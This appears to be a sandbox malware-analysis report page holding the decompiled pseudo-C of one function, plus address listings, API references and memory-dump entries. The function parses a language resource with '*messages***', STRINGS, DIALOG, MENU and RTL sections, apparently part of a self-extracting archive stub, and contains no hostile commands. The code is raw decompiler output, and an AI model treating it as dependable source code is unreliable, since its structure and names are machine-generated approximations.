                Uniqueness Score: -1.00%

                Function 003DDA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E003DDA67(char* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t245;
				void* _t246;
				WCHAR* _t247;
				void* _t252;
				unsigned int _t258;
				signed int _t264;
				signed int _t268;
				void* _t279;
				signed short* _t283;
				void* _t284;
				void* _t290;
				signed short* _t294;
				void* _t295;
				signed int _t299;
				signed int _t303;
				signed int _t318;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				signed int _t333;
				char* _t334;
				signed int _t338;
				short _t341;
				void* _t342;
				signed int _t346;
				char* _t348;
				char* _t350;
				char* _t355;
				void* _t358;
				void* _t360;
				void* _t363;
				signed int _t372;
				char* _t374;
				unsigned int _t385;
				unsigned int _t389;
				signed int _t392;
				signed int _t397;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				char* _t421;
				signed int _t424;
				signed int _t425;
				void* _t430;
				char* _t434;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				char* _t451;
				signed int _t453;
				signed int _t455;
				void* _t456;
				intOrPtr* _t459;
				signed int _t461;
				signed int _t462;
				char* _t463;
				signed int _t466;
				signed int _t467;
				char** _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t478;

				_t443 = __edx;
				_t471 = _t470 - 0x54;
				E003EEB78(0x4029bd, _t468);
				E003EEC50(0x41fc);
				_t245 = 0x5c;
				_push(_t245);
				_push(_t468[0x18]);
				_t459 = __ecx;
				_t468[4] = _t245;
				_t468[0xe] = __ecx;
				_t246 = E003F22C6(__ecx);
				_t372 = 0;
				_t475 = _t246;
				_t247 = _t468 - 0x31d0;
				if(_t246 != 0) {
					E003E0602(_t247, _t468[0x18], 0x800);
				} else {
					GetModuleFileNameW(0, _t247, 0x800);
					 *((short*)(E003DC29A(_t475, _t468 - 0x31d0))) = 0;
					E003E05DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
				}
				E003D9556(_t468 - 0x4208);
				_push(4);
				 *(_t468 - 4) = _t372;
				_push(_t468 - 0x31d0);
				if(E003D98E0(_t468 - 0x4208, _t459) == 0) {
					L125:
					_t252 = E003D959A(_t468 - 0x4208); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
					__eflags =  &(_t468[0x16]);
					return _t252;
				} else {
					_t447 = _t372;
					_t477 =  *0x40e720 - _t447; // 0x64
					if(_t477 <= 0) {
						L7:
						E003F6310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E003DD6E0);
						E003F6310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E003DD640);
						_t473 = _t471 + 0x20;
						_t468[0x14] = _t372;
						_t448 = _t447 | 0xffffffff;
						_t468[0xf] = _t372;
						while(_t448 == 0xffffffff) {
							_t348 = E003D9E80(_t468 - 0x4208); // executed
							_t468[0x12] = _t348;
							_t350 = E003D9BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
							_t468[0x11] = _t350;
							_t467 = _t372;
							_t24 = _t350 - 0x10; // -16
							_t434 = _t24;
							_t468[0xa] = _t434;
							if(_t434 < 0) {
								L25:
								_t351 = _t468[0x12];
								L26:
								E003D9D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
								_t355 =  &(_t468[0xf][1]);
								_t468[0xf] = _t355;
								__eflags = _t355 - 0x100;
								if(_t355 < 0x100) {
									continue;
								}
								__eflags = _t448 - 0xffffffff;
								if(_t448 == 0xffffffff) {
									goto L125;
								}
								break;
							} else {
								goto L10;
							}
							L12:
							_t363 = E003F6740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
							_t473 = _t473 + 0xc;
							if(_t363 == 0) {
								L24:
								_t351 = _t468[0x12];
								_t448 =  &(_t468[0x12][_t467]);
								goto L26;
							} else {
								_t350 = _t468[0x11];
							}
							L14:
							_t443 = 0x2a;
							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
								L18:
								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
									L21:
									_t467 = _t467 + 1;
									if(_t467 > _t468[0xa]) {
										goto L25;
									} else {
										_t350 = _t468[0x11];
										L10:
										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
											goto L14;
										} else {
											goto L12;
										}
									}
								} else {
									_t358 = E003F6740(_t468 - 0x21ce + _t467, 0x4039c8, 4);
									_t473 = _t473 + 0xc;
									if(_t358 == 0) {
										goto L125;
									}
									goto L21;
								}
							}
							_t439 = _t468 - 0x21cc + _t467;
							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
								_t360 = E003F6088(_t439, L"*messages***", 0xb);
								_t473 = _t473 + 0xc;
								if(_t360 == 0) {
									_t468[0x14] = 1;
									goto L24;
								}
							}
							goto L18;
						}
						asm("cdq");
						E003D9D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
						_push(0x200002);
						_t461 = E003F3E33(_t468 - 0x4208);
						_t468[0x13] = _t461;
						__eflags = _t461;
						if(_t461 == 0) {
							goto L125;
						}
						_t258 = E003D9BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
						__eflags = _t468[0x14];
						_t385 = _t258;
						_t468[0x12] = _t385;
						if(_t468[0x14] == 0) {
							_push(2 + _t385 * 2);
							_t449 = E003F3E33(_t385);
							__eflags = _t449;
							if(_t449 == 0) {
								goto L125;
							}
							_t468[0x12][_t461] = _t372;
							E003E1B84(_t461, _t449,  &(_t468[0x12][1]));
							L003F3E2E(_t461);
							_t389 = _t468[0x12];
							_t461 = _t449;
							_t468[0x13] = _t461;
							L33:
							_t264 = 0x100000;
							__eflags = _t389 - 0x100000;
							if(_t389 <= 0x100000) {
								_t264 = _t389;
							}
							 *((short*)(_t461 + _t264 * 2)) = 0;
							E003E05A7(_t468 - 0x108, 0x4039d0, 0x64);
							_push(0x20002);
							_t450 = E003F3E33(0);
							_t468[0x11] = _t450;
							__eflags = _t450;
							if(_t450 != 0) {
								__eflags = _t468[0x12];
								_t462 = _t372;
								_t392 = _t372;
								_t468[0xc] = _t462;
								_t268 = _t372;
								 *(_t468 - 0x40) = _t372;
								_t468[0xb] = _t392;
								_t468[0x15] = _t268;
								_t468[0xa] = 0x20;
								_t468[0xf] = 9;
								if(_t468[0x12] <= 0) {
									L109:
									__eflags =  *(_t468 - 0x40);
									if( *(_t468 - 0x40) == 0) {
										_t463 = _t468[0xe];
										L122:
										L003F3E2E(_t468[0x13]);
										L003F3E2E(_t468[0x11]);
										_t451 =  &(_t463[0x3c]);
										__eflags = _t463[0x2c] - _t372;
										if(_t463[0x2c] <= _t372) {
											L124:
											 *0x4110b8 = _t463[0x28];
											E003F6310(_t372,  *_t451, _t463[0x40], 4, E003DD7A0);
											E003F6310(_t372, _t463[0x50], _t463[0x54], 4, E003DD7D0);
											goto L125;
										} else {
											goto L123;
										}
										do {
											L123:
											E003DE261(_t451, _t443, _t372);
											E003DE261( &(_t463[0x50]), _t443, _t372);
											_t372 = _t372 + 1;
											__eflags = _t372 - _t463[0x2c];
										} while (_t372 < _t463[0x2c]);
										goto L124;
									}
									_t468[7] = _t392;
									_t468[8] = E003F8CCE(_t372, _t462, _t468 - 0x40);
									_pop(_t397);
									__eflags = _t462;
									if(_t462 == 0) {
										L118:
										 *(_t450 + _t462 * 2) = 0;
										_t279 = 0x22;
										__eflags =  *_t450 - _t279;
										if( *_t450 == _t279) {
											__eflags = _t450;
										}
										_t468[9] = E003F7625(_t372, _t450);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t463 = _t468[0xe];
										E003DE27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
										goto L122;
									}
									_t212 = _t462 - 1; // -1
									_t283 = _t450 + _t212 * 2;
									_t443 = 0x20;
									do {
										_t397 =  *_t283 & 0x0000ffff;
										__eflags = _t397 - _t443;
										if(_t397 == _t443) {
											goto L114;
										}
										__eflags = _t397 - _t468[0xf];
										if(_t397 != _t468[0xf]) {
											break;
										}
										L114:
										_t397 = 0;
										 *_t283 = 0;
										_t283 = _t283 - 2;
										_t462 = _t462 - 1;
										__eflags = _t462;
									} while (_t462 != 0);
									__eflags = _t462;
									if(_t462 != 0) {
										_t284 = 0x22;
										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
											__eflags = 0;
											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
										}
									}
									goto L118;
								}
								_t468[6] = 0xd;
								_t468[5] = 0xa;
								do {
									_t399 = _t468[0x13];
									__eflags = _t268;
									if(_t268 == 0) {
										L75:
										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
										_t268 = _t268 + 1;
										_t468[0x15] = _t268;
										__eflags = _t443;
										if(_t443 == 0) {
											break;
										}
										__eflags = _t443 - _t468[4];
										if(_t443 != _t468[4]) {
											_t400 = 0xd;
											__eflags = _t443 - _t400;
											if(_t443 == _t400) {
												L93:
												__eflags =  *(_t468 - 0x40);
												if( *(_t468 - 0x40) == 0) {
													L105:
													 *(_t468 - 0x40) = _t372;
													_t462 = _t372;
													_t468[0xb] = _t372;
													L106:
													_t468[0xc] = _t462;
													goto L107;
												}
												_t468[7] = _t468[0xb];
												_t468[8] = E003F8CCE(_t372, _t462, _t468 - 0x40);
												_pop(_t401);
												__eflags = _t462;
												if(_t462 == 0) {
													L102:
													 *(_t450 + _t462 * 2) = 0;
													_t290 = 0x22;
													__eflags =  *_t450 - _t290;
													if( *_t450 == _t290) {
														__eflags = _t450;
													}
													_t468[9] = E003F7625(_t372, _t450);
													asm("movsd");
													asm("movsd");
													asm("movsd");
													E003DE27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
													_t450 = _t468[0x11];
													_t268 = _t468[0x15];
													goto L105;
												}
												_t185 = _t462 - 1; // -1
												_t294 = _t450 + _t185 * 2;
												_t443 = 0x20;
												do {
													_t401 =  *_t294 & 0x0000ffff;
													__eflags = _t401 - _t443;
													if(_t401 == _t443) {
														goto L98;
													}
													__eflags = _t401 - _t468[0xf];
													if(_t401 != _t468[0xf]) {
														break;
													}
													L98:
													_t401 = 0;
													 *_t294 = 0;
													_t294 = _t294 - 2;
													_t462 = _t462 - 1;
													__eflags = _t462;
												} while (_t462 != 0);
												__eflags = _t462;
												if(_t462 != 0) {
													_t295 = 0x22;
													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
														__eflags = 0;
														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
													}
												}
												goto L102;
											}
											_t404 = 0xa;
											__eflags = _t443 - _t404;
											if(_t443 == _t404) {
												goto L93;
											}
											__eflags = _t462 - 0x10000;
											if(_t462 >= 0x10000) {
												goto L107;
											}
											L92:
											 *(_t450 + _t462 * 2) = _t443;
											_t462 = _t462 + 1;
											goto L106;
										}
										__eflags = _t462 - 0x10000;
										if(_t462 >= 0x10000) {
											goto L107;
										}
										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t406;
										if(_t406 == 0) {
											_push(0x22);
											L88:
											_pop(_t407);
											 *(_t450 + _t462 * 2) = _t407;
											_t268 = _t268 + 1;
											_t468[0x15] = _t268;
											_t462 = _t462 + 1;
											goto L106;
										}
										_t410 = _t406 - 0x3a;
										__eflags = _t410;
										if(_t410 == 0) {
											_push(0x5c);
											goto L88;
										}
										_t411 = _t410 - 0x12;
										__eflags = _t411;
										if(_t411 == 0) {
											_push(0xa);
											goto L88;
										}
										_t412 = _t411 - 4;
										__eflags = _t412;
										if(_t412 == 0) {
											_push(0xd);
											goto L88;
										}
										__eflags = _t412 != 0;
										if(_t412 != 0) {
											goto L92;
										}
										_push(9);
										goto L88;
									}
									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
									__eflags = _t444 - _t468[6];
									if(_t444 == _t468[6]) {
										L42:
										_t443 = 0x3a;
										__eflags =  *(_t399 + _t268 * 2) - _t443;
										if( *(_t399 + _t268 * 2) != _t443) {
											L65:
											_t468[0x10] = _t399 + _t268 * 2;
											_t299 = E003E045B( *(_t399 + _t268 * 2) & 0x0000ffff);
											__eflags = _t299;
											if(_t299 == 0) {
												L74:
												_t399 = _t468[0x13];
												_t268 = _t468[0x15];
												goto L75;
											}
											E003E0602(_t468 - 0x298, _t468[0x10], 0x64);
											_t303 = E003F6105(_t468 - 0x298, L" \t,");
											_t468[0x10] = _t303;
											__eflags = _t303;
											if(_t303 == 0) {
												goto L74;
											}
											 *_t303 = 0;
											E003E1DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
											E003E05A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
											E003E0580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
											E003E05A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
											_t318 = E003F6159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E003DD780);
											_t473 = _t473 + 0x14;
											__eflags = _t318;
											if(_t318 != 0) {
												_t322 =  *_t318 * 0xc;
												__eflags = _t322;
												_t156 = _t322 + 0x40e270; // 0x28b64ee0
												_t468[0xb] =  *_t156;
											}
											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
											__eflags = _t268;
											_t421 = _t468[0x13];
											while(1) {
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												L71:
												__eflags = _t443 - _t468[0xf];
												if(_t443 != _t468[0xf]) {
													_t468[0x15] = _t268;
													goto L107;
												}
												L72:
												_t268 = _t268 + 1;
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												goto L71;
											}
										}
										_t453 = _t468[0x15];
										_t324 = _t268 | 0xffffffff;
										__eflags = _t324;
										_t466 = _t372;
										_t468[0xd] = _t324;
										_t374 = _t468[0x13];
										 *_t468 = L"STRINGS";
										_t468[1] = L"DIALOG";
										_t468[2] = L"MENU";
										_t468[3] = L"DIRECTION";
										do {
											_t468[0x10] = E003F3E13(_t468[_t466]);
											_t326 = E003F6088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
											_t473 = _t473 + 0x10;
											__eflags = _t326;
											if(_t326 != 0) {
												L47:
												_t424 = _t468[0xd];
												goto L48;
											}
											_t346 =  &(_t468[0x10][_t453]);
											_t430 = 0x20;
											__eflags = _t374[2 + _t346 * 2] - _t430;
											if(_t374[2 + _t346 * 2] > _t430) {
												goto L47;
											}
											_t424 = _t466;
											_t453 = _t346 + 1;
											_t468[0xd] = _t424;
											L48:
											_t466 = _t466 + 1;
											__eflags = _t466 - 4;
										} while (_t466 < 4);
										_t462 = _t468[0xc];
										_t372 = 0;
										_t468[0x15] = _t453;
										_t450 = _t468[0x11];
										__eflags = _t424;
										if(__eflags != 0) {
											_t268 = _t468[0x15];
											_t399 = _t468[0x13];
											if(__eflags <= 0) {
												goto L65;
											} else {
												goto L53;
											}
											while(1) {
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												L54:
												__eflags = _t455 - _t468[0xf];
												if(_t455 != _t468[0xf]) {
													_t468[0x15] = _t268;
													_t425 = _t372;
													_t456 = 0x20;
													__eflags = ( *_t443 & 0x0000ffff) - _t456;
													_t468[0x10] = _t372;
													_t450 = _t468[0x11];
													if(( *_t443 & 0x0000ffff) <= _t456) {
														L60:
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
														E003E1DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
														_t333 = _t468[0xd];
														__eflags = _t333 - 3;
														if(_t333 != 3) {
															__eflags = _t333 - 1;
															_t334 = "$%s:";
															if(_t333 != 1) {
																_t334 = "@%s:";
															}
															E003DE5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
															_t473 = _t473 + 0x10;
														} else {
															_t338 = E003F3E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
															asm("sbb al, al");
															_t468[0xe][0x64] =  ~_t338 + 1;
														}
														L51:
														_t268 = _t468[0x15];
														goto L107;
													} else {
														goto L57;
													}
													while(1) {
														L57:
														__eflags = _t425 - 0x63;
														if(_t425 >= 0x63) {
															break;
														}
														_t341 =  *_t443;
														_t443 = _t443 + 2;
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
														_t425 = _t425 + 1;
														_t342 = 0x20;
														__eflags =  *_t443 - _t342;
														if( *_t443 > _t342) {
															continue;
														}
														break;
													}
													_t468[0x10] = _t425;
													goto L60;
												}
												L55:
												_t268 = _t268 + 1;
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												goto L54;
											}
										}
										E003E05A7(_t468 - 0x108, 0x4039d0, 0x64);
										goto L51;
									}
									__eflags = _t444 - _t468[5];
									if(_t444 != _t468[5]) {
										goto L75;
									}
									goto L42;
									L107:
									__eflags = _t268 - _t468[0x12];
								} while (_t268 < _t468[0x12]);
								_t392 = _t468[0xb];
								goto L109;
							} else {
								L003F3E2E(_t461);
								goto L125;
							}
						}
						_t389 = _t385 >> 1;
						_t468[0x12] = _t389;
						goto L33;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E003DE261(_t459, _t443, _t447);
					E003DE261(_t459 + 0x14, _t443, _t447);
					_t447 = _t447 + 1;
					_t478 = _t447 -  *0x40e720; // 0x64
					if(_t478 < 0) {
						goto L5;
					} else {
						_t372 = 0;
						goto L7;
					}
				}
			}
















































































                0x003dda67
                0x003dda68
                0x003dda70
                0x003dda7a
                0x003dda84
                0x003dda85
                0x003dda86
                0x003dda89
                0x003dda8b
                0x003dda8e
                0x003dda91
                0x003dda97
                0x003dda99
                0x003dda9c
                0x003ddaa2
                0x003ddade
                0x003ddaa4
                0x003ddaac
                0x003ddac4
                0x003ddace
                0x003ddace
                0x003ddae9
                0x003ddaee
                0x003ddaf6
                0x003ddaf9
                0x003ddb07
                0x003de242
                0x003de248
                0x003de252
                0x003de25a
                0x003de25e
                0x003ddb0d
                0x003ddb0d
                0x003ddb0f
                0x003ddb15
                0x003ddb33
                0x003ddb3f
                0x003ddb51
                0x003ddb56
                0x003ddb59
                0x003ddb5c
                0x003ddb5f
                0x003ddb62
                0x003ddb71
                0x003ddb76
                0x003ddb8b
                0x003ddb90
                0x003ddb93
                0x003ddb95
                0x003ddb95
                0x003ddb98
                0x003ddb9d
                0x003ddc5a
                0x003ddc5a
                0x003ddc5d
                0x003ddc6e
                0x003ddc76
                0x003ddc77
                0x003ddc7a
                0x003ddc7f
                0x00000000
                0x00000000
                0x003ddc85
                0x003ddc88
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ddbb7
                0x003ddbc7
                0x003ddbcc
                0x003ddbd1
                0x003ddc52
                0x003ddc52
                0x003ddc55
                0x00000000
                0x003ddbd3
                0x003ddbd3
                0x003ddbd3
                0x003ddbd6
                0x003ddbd8
                0x003ddbe1
                0x003ddc0c
                0x003ddc14
                0x003ddc40
                0x003ddc40
                0x003ddc44
                0x00000000
                0x003ddc46
                0x003ddc46
                0x003ddba3
                0x003ddbab
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ddbab
                0x003ddc20
                0x003ddc30
                0x003ddc35
                0x003ddc3a
                0x00000000
                0x00000000
                0x00000000
                0x003ddc3a
                0x003ddc14
                0x003ddbe9
                0x003ddbef
                0x003ddc00
                0x003ddc05
                0x003ddc0a
                0x003ddc4e
                0x00000000
                0x003ddc4e
                0x003ddc0a
                0x00000000
                0x003ddbef
                0x003ddc97
                0x003ddc9a
                0x003ddc9f
                0x003ddca9
                0x003ddcab
                0x003ddcaf
                0x003ddcb1
                0x00000000
                0x00000000
                0x003ddcc3
                0x003ddcc8
                0x003ddccc
                0x003ddcce
                0x003ddcd1
                0x003ddce1
                0x003ddce7
                0x003ddcea
                0x003ddcec
                0x00000000
                0x00000000
                0x003ddcf8
                0x003ddcfe
                0x003ddd04
                0x003ddd0a
                0x003ddd0d
                0x003ddd0f
                0x003ddd12
                0x003ddd12
                0x003ddd17
                0x003ddd19
                0x003ddd1b
                0x003ddd1b
                0x003ddd21
                0x003ddd31
                0x003ddd36
                0x003ddd40
                0x003ddd42
                0x003ddd46
                0x003ddd48
                0x003ddd56
                0x003ddd5a
                0x003ddd5c
                0x003ddd5e
                0x003ddd61
                0x003ddd63
                0x003ddd66
                0x003ddd69
                0x003ddd6c
                0x003ddd73
                0x003ddd7a
                0x003de15c
                0x003de15c
                0x003de160
                0x003de1e0
                0x003de1e3
                0x003de1e6
                0x003de1ee
                0x003de1f3
                0x003de1f8
                0x003de1fb
                0x003de214
                0x003de221
                0x003de228
                0x003de23a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003de1fd
                0x003de1fd
                0x003de200
                0x003de209
                0x003de20e
                0x003de20f
                0x003de20f
                0x00000000
                0x003de1fd
                0x003de165
                0x003de16e
                0x003de171
                0x003de172
                0x003de174
                0x003de1af
                0x003de1b1
                0x003de1b7
                0x003de1b8
                0x003de1bb
                0x003de1bd
                0x003de1bd
                0x003de1ca
                0x003de1d0
                0x003de1d1
                0x003de1d2
                0x003de1d3
                0x003de1d9
                0x00000000
                0x003de1d9
                0x003de176
                0x003de17b
                0x003de17e
                0x003de17f
                0x003de17f
                0x003de182
                0x003de185
                0x00000000
                0x00000000
                0x003de187
                0x003de18b
                0x00000000
                0x00000000
                0x003de18d
                0x003de18d
                0x003de18f
                0x003de192
                0x003de195
                0x003de195
                0x003de195
                0x003de19a
                0x003de19c
                0x003de1a0
                0x003de1a1
                0x003de1a6
                0x003de1a8
                0x003de1aa
                0x003de1aa
                0x003de1a6
                0x00000000
                0x003de19c
                0x003ddd80
                0x003ddd87
                0x003ddd8e
                0x003ddd8e
                0x003ddd91
                0x003ddd93
                0x003de02a
                0x003de02a
                0x003de02e
                0x003de02f
                0x003de032
                0x003de035
                0x00000000
                0x00000000
                0x003de03b
                0x003de03f
                0x003de092
                0x003de093
                0x003de096
                0x003de0b6
                0x003de0b6
                0x003de0ba
                0x003de145
                0x003de145
                0x003de148
                0x003de14a
                0x003de14d
                0x003de14d
                0x00000000
                0x003de14d
                0x003de0c3
                0x003de0cf
                0x003de0d2
                0x003de0d3
                0x003de0d5
                0x003de110
                0x003de112
                0x003de118
                0x003de119
                0x003de11c
                0x003de11e
                0x003de11e
                0x003de131
                0x003de137
                0x003de138
                0x003de139
                0x003de13a
                0x003de13f
                0x003de142
                0x00000000
                0x003de142
                0x003de0d7
                0x003de0dc
                0x003de0df
                0x003de0e0
                0x003de0e0
                0x003de0e3
                0x003de0e6
                0x00000000
                0x00000000
                0x003de0e8
                0x003de0ec
                0x00000000
                0x00000000
                0x003de0ee
                0x003de0ee
                0x003de0f0
                0x003de0f3
                0x003de0f6
                0x003de0f6
                0x003de0f6
                0x003de0fb
                0x003de0fd
                0x003de101
                0x003de102
                0x003de107
                0x003de109
                0x003de10b
                0x003de10b
                0x003de107
                0x00000000
                0x003de0fd
                0x003de09a
                0x003de09b
                0x003de09e
                0x00000000
                0x00000000
                0x003de0a0
                0x003de0a6
                0x00000000
                0x00000000
                0x003de0ac
                0x003de0ac
                0x003de0b0
                0x00000000
                0x003de0b0
                0x003de041
                0x003de047
                0x00000000
                0x00000000
                0x003de051
                0x003de051
                0x003de054
                0x003de07b
                0x003de07d
                0x003de07d
                0x003de07e
                0x003de085
                0x003de086
                0x003de089
                0x00000000
                0x003de089
                0x003de056
                0x003de056
                0x003de059
                0x003de077
                0x00000000
                0x003de077
                0x003de05b
                0x003de05b
                0x003de05e
                0x003de073
                0x00000000
                0x003de073
                0x003de060
                0x003de060
                0x003de063
                0x003de06f
                0x00000000
                0x003de06f
                0x003de066
                0x003de069
                0x00000000
                0x00000000
                0x003de06b
                0x00000000
                0x003de06b
                0x003ddd99
                0x003ddd9e
                0x003ddda2
                0x003dddae
                0x003dddb0
                0x003dddb1
                0x003dddb5
                0x003ddf29
                0x003ddf2c
                0x003ddf33
                0x003ddf38
                0x003ddf3a
                0x003de024
                0x003de024
                0x003de027
                0x00000000
                0x003de027
                0x003ddf4c
                0x003ddf5d
                0x003ddf62
                0x003ddf67
                0x003ddf69
                0x00000000
                0x00000000
                0x003ddf71
                0x003ddf84
                0x003ddf99
                0x003ddfae
                0x003ddfc0
                0x003ddfdb
                0x003ddfe0
                0x003ddfe3
                0x003ddfe5
                0x003ddfe7
                0x003ddfe7
                0x003ddfea
                0x003ddff0
                0x003ddff0
                0x003de004
                0x003de004
                0x003de006
                0x003de009
                0x003de009
                0x003de00d
                0x003de011
                0x00000000
                0x00000000
                0x003de013
                0x003de013
                0x003de017
                0x003de01c
                0x00000000
                0x003de01c
                0x003de019
                0x003de019
                0x003de009
                0x003de00d
                0x003de011
                0x00000000
                0x00000000
                0x00000000
                0x003de011
                0x003de009
                0x003dddbb
                0x003dddbe
                0x003dddbe
                0x003dddc1
                0x003dddc3
                0x003dddc6
                0x003dddc9
                0x003dddd0
                0x003dddd7
                0x003dddde
                0x003ddde5
                0x003dddf6
                0x003dddfd
                0x003dde02
                0x003dde05
                0x003dde07
                0x003dde22
                0x003dde22
                0x00000000
                0x003dde22
                0x003dde0c
                0x003dde10
                0x003dde11
                0x003dde16
                0x00000000
                0x00000000
                0x003dde18
                0x003dde1a
                0x003dde1d
                0x003dde25
                0x003dde25
                0x003dde26
                0x003dde26
                0x003dde2b
                0x003dde2e
                0x003dde30
                0x003dde33
                0x003dde36
                0x003dde38
                0x003dde55
                0x003dde58
                0x003dde5b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dde61
                0x003dde61
                0x003dde61
                0x003dde64
                0x003dde67
                0x003dde6b
                0x00000000
                0x00000000
                0x003dde6d
                0x003dde6d
                0x003dde71
                0x003dde78
                0x003dde7b
                0x003dde80
                0x003dde81
                0x003dde84
                0x003dde87
                0x003dde8a
                0x003ddeab
                0x003ddead
                0x003ddec5
                0x003ddecd
                0x003dded0
                0x003dded3
                0x003dded6
                0x003ddefc
                0x003ddeff
                0x003ddf04
                0x003ddf06
                0x003ddf06
                0x003ddf1c
                0x003ddf21
                0x003dded8
                0x003ddee4
                0x003ddef0
                0x003ddef4
                0x003ddef4
                0x003dde4d
                0x003dde4d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dde8c
                0x003dde8c
                0x003dde8c
                0x003dde8f
                0x00000000
                0x00000000
                0x003dde91
                0x003dde94
                0x003dde97
                0x003dde9f
                0x003ddea2
                0x003ddea3
                0x003ddea6
                0x00000000
                0x00000000
                0x00000000
                0x003ddea6
                0x003ddea8
                0x00000000
                0x003ddea8
                0x003dde73
                0x003dde73
                0x003dde61
                0x003dde61
                0x003dde64
                0x003dde67
                0x003dde6b
                0x00000000
                0x00000000
                0x00000000
                0x003dde6b
                0x003dde61
                0x003dde48
                0x00000000
                0x003dde48
                0x003ddda4
                0x003ddda8
                0x00000000
                0x00000000
                0x00000000
                0x003de150
                0x003de150
                0x003de150
                0x003de159
                0x00000000
                0x003ddd4a
                0x003ddd4b
                0x00000000
                0x003ddd50
                0x003ddd48
                0x003ddcd3
                0x003ddcd5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ddb17
                0x003ddb1a
                0x003ddb23
                0x003ddb28
                0x003ddb29
                0x003ddb2f
                0x00000000
                0x003ddb31
                0x003ddb31
                0x00000000
                0x003ddb31
                0x003ddb2f

                APIs
                • __EH_prolog.LIBCMT ref: 003DDA70
                • _wcschr.LIBVCRUNTIME ref: 003DDA91
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003DDAAC
                  • Part of subcall function 003DC29A: _wcslen.LIBCMT ref: 003DC2A2
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                  • Part of subcall function 003E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,003DBAE9,00000000,?,?,?,000303F2), ref: 003E1BA0
                • _wcslen.LIBCMT ref: 003DDDE9
                • __fprintf_l.LIBCMT ref: 003DDF1C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
